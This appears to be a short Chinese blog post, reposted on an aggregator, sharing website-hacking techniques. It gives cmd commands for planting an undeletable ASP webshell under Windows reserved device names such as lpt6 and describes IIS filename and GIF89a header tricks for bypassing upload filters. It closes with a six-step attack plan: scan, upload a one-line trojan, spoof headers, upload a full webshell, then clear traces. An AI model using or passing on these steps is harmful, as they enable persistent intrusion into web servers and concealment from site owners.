zoukankan      html  css  js  c++  java
  • 最近总被黑。然后。。发现了很多知识值得学习。。分享出来。

    畸形文件
     
    利用系统保留文件名创建无法删除的webshell2012/11/20 04:14 P.M.Windows 下不能够以下面这些字样来命名文件/文件夹:
    aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9 
     但是通过cmd的copy命令即可实现: 
    创建时。可试着用引号
     D:\wwwroot>copy rootkit.asp \\.\D:\wwwroot\lpt6.80sec.asp    前面必须有 \\.\ 
    删除记得引号。
    写入内容
    echo      hello>\\.\E:\lpt4.xj.asp;.jpg
    显示内容
    type \\.\E:\lpt4.xj.asp;.jpg
     
    方法。理解。
    \\.\
    加..\
    加""
    特殊BUG渠道
    查看可用ren 更名。然后查看内容。
     
    eve 方法。执行语句。注意各大上传入口。只要上传这一句。就可以拿下网站。

    Gif89a 语句欺骗IIS 解析成图片。

    黑方法。

    1.准备大马。

    2.准备扫描。

    3.突破口找到,上传一句话木马。

    4.头欺骗。绕过上传过滤。制作上传入口。可利用一句话木马创建

    5.上传大马。

    6.清理痕迹。

  • 相关阅读:
    Alpha项目冲刺_博客链接合集
    项目系统设计
    项目需求分析
    项目选题
    项目展示
    原型设计 + 用户规格说明书
    测试与优化
    结对作业1
    MathExam6317
    js入门基础
  • 原文地址:https://www.cnblogs.com/Jlasp/p/3079227.html
Copyright © 2011-2022 走看看